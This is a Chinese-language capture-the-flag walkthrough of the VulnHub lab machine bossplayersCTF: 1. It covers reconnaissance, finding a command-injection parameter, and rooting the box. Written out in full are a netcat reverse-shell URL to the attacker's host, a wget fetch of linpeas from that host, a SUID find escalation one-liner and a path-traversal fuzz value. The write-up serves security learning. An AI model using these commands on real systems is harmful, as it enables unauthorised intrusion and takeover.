bossplayersCTF: 1
作者:jason_huawen
靶机基本信息
名称:bossplayersCTF: 1
地址:
https://www.vulnhub.com/entry/bossplayersctf-1,375/
提示:Aimed at Beginner Security Professionals who want to get their feet wet
into doing some CTF's. It should take around 30 minutes to root.
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.84.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:f3:da:85 1 60 PCS Systemtechnik GmbH
192.168.56.247 08:00:27:39:e5:5e 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.247
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.247 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-01 08:11 EST
Nmap scan report for bogon (192.168.56.247)
Host is up (0.000072s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 ac:0d:1e:71:40:ef:6e:65:91:95:8d:1c:13:13:8e:3e (RSA)
| 256 24:9e:27:18:df:a4:78:3b:0d:11:8a:92:72:bd:05:8d (ECDSA)
|_ 256 26:32:8d:73:89:05:29:43:8e:a1:13:ba:4f:83:53:f8 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:39:E5:5E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ curl http://192.168.56.247/
<!DOCTYPE html>
<html>
<body>
<h2>bossplayers CTF - created by Cuong Nguyen</h2>
<p>Difficulty Level: [* ] [ ] [ ] [ ] [ ]</p>
<p>Description: Hello! Extremely easy CTF that I created for those who want to get their feet wet. Have a methodology and avoid the rabit holes! I hope you enjoy this and most importantly, please have fun!</p>
<p>Website: sudocuong.com</p>
</body>
</html>
<!--WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK-->
访问80端口返回页面源代码中国有注释:
用cyberchef工具进行解码,进行了3层base64编码,解码以后得到:
workinginprogress.php
──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ curl http://192.168.56.247/workinginprogress.php
<html>
<body>
<h3>System Install:</h3>
<p>Linux Debian - [*]</p>
<p>APACHE2 - [*]</p>
<p>PHP - [*]</p>
<h3>Outstanding:</h3>
<p>Test ping command - [ ]</p>
<p>Fix Privilege Escalation - [ ]</p>
<h3>Completed:</h3>
<p>Say Hi to Haley - [*]</p>
</body>
</html>
这里是不是表明用户名是haley?
──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ curl http://192.168.56.247/robots.txt
super secret password - bG9sIHRyeSBoYXJkZXIgYnJvCg==
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ echo 'bG9sIHRyeSBoYXJkZXIgYnJvCg==' -n | base64 -d
lol try harder bro
base64: invalid input
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ echo 'bG9sIHRyeSBoYXJkZXIgYnJvCg==' | base64 -d
lol try harder bro
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/01 08:17:56 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 302]
Progress: 218950 / 220561 (99.27%)===============================================================
2022/12/01 08:18:22 Finished
===============================================================
没有扫描出任何目录。
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,php,html,sh
[+] Timeout: 10s
===============================================================
2022/12/01 08:19:11 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 293]
/index.html (Status: 200) [Size: 575]
/.html (Status: 403) [Size: 294]
/robots.txt (Status: 200) [Size: 53]
/logs.php (Status: 200) [Size: 34093]
/.php (Status: 403) [Size: 293]
/.html (Status: 403) [Size: 294]
/server-status (Status: 403) [Size: 302]
Progress: 1100003 / 1102805 (99.75%)===============================================================
2022/12/01 08:21:29 Finished
=============================================================
发现了/logs.php文件,但是访问该文件,返回似乎是系统的一些日志信息。
workinginprogress.php提示有Ping命令,因此该页面应该有命令执行,用wfuzz FUZZ出参数:
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ wfuzz -c -u http://192.168.56.247/workinginprogress.php?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 36
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.247/workinginprogress.php?FUZZ=id
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000005340: 200 25 L 39 W 325 Ch "cmd"
进行模糊测试,参数为cmd,并手动确认一下:
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ curl http://192.168.56.247/workinginprogress.php?cmd=id
<html>
<body>
<h3>System Install:</h3>
<p>Linux Debian - [*]</p>
<p>APACHE2 - [*]</p>
<p>PHP - [*]</p>
<h3>Outstanding:</h3>
<p>Test ping command - [ ]</p>
<p>Fix Privilege Escalation - [ ]</p>
<h3>Completed:</h3>
<p>Say Hi to Haley - [*]</p>
</body>
</html>
uid=33(www-data) gid=33(www-data) groups=33(www-data)
下一步设法获得shell,因此利用命令执行漏洞测试一下nc等是否可用?
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ curl http://192.168.56.247/workinginprogress.php?cmd=which%20nc
<html>
<body>
<h3>System Install:</h3>
<p>Linux Debian - [*]</p>
<p>APACHE2 - [*]</p>
<p>PHP - [*]</p>
<h3>Outstanding:</h3>
<p>Test ping command - [ ]</p>
<p>Fix Privilege Escalation - [ ]</p>
<h3>Completed:</h3>
<p>Say Hi to Haley - [*]</p>
</body>
</html>
/usr/bin/nc
在浏览器中方法下面的地址获得shell:
http://192.168.56.247/workinginprogress.php?cmd=nc%20-e%20/bin/bash%20192.168.56.206%205555
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.247] 36778
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@bossplayers:/var/www/html$
成功获得shell
提权
将Linpeas.sh脚本上传至目标主机/tmp目录,修改权限,并执行脚本:
www-data@bossplayers:/var/www/html$ cd /tmp
cd /tmp
www-data@bossplayers:/tmp$ wget http://192.168.56.206:8000/linpeas.sh
wget http://192.168.56.206:8000/linpeas.sh
--2022-12-02 00:55:53-- http://192.168.56.206:8000/linpeas.sh
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765823 (748K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 747.87K --.-KB/s in 0.003s
2022-12-02 00:55:53 (239 MB/s) - 'linpeas.sh' saved [765823/765823]
www-data@bossplayers:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@bossplayers:/tmp$ ./linpeas.sh
./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
linpeas.sh输出结果中:
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strings Not Found
strace Not Found
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-sr-x 1 root root 195K Jan 8 2019 /usr/bin/grep
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-sr-x 1 root root 309K Feb 16 2019 /usr/bin/find
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-- 1 root messagebus 50K Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Apr 8 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
利用find命令的SUID位进行提权,参照GTFOBINS网站给的方法进行提权:
www-data@bossplayers:/tmp$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
# cd /root
cd /root
# ls -alh
ls -alh
total 24K
drwx------ 2 root root 4.0K Sep 28 2019 .
drwxr-xr-x 18 root root 4.0K Sep 28 2019 ..
-rw------- 1 root root 929 Sep 28 2019 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 148 Aug 18 2015 .profile
-rw-r--r-- 1 root root 25 Sep 28 2019 root.txt
# cat root.txt
cat root.txt
Y29uZ3JhdHVsYXRpb25zCg==
#
成功拿到root flag.
经验教训
-
第一直接是正确的,就是有命令执行漏洞可以利用,因为作者提到了ping,但是在做牧户测试时,FUZZ=test,因为test不是实际的命令,导致即使FUZZ到了正确的参数名称,返回与不正确参数返回是一样的,也就是说发现不了正确的参数命令,正确的命令执行模糊测试就是FUZZ=id, 而在做本地文件包含测试时为FUZZ=../../../../../../etc/passwd
-
作者提到的Rabbithole应该就是haley,假设它为用户名,然后用hydra进行破解